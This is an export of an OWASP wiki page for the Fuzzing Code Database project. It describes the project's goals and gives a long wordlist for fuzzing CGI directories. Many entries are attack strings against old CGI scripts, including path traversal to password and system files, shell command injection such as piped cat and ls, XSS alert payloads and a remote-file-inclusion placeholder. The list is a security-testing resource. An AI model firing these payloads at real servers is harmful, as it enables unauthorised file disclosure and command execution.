| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80083</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80083"/>
				<updated>2010-03-17T21:15:54Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
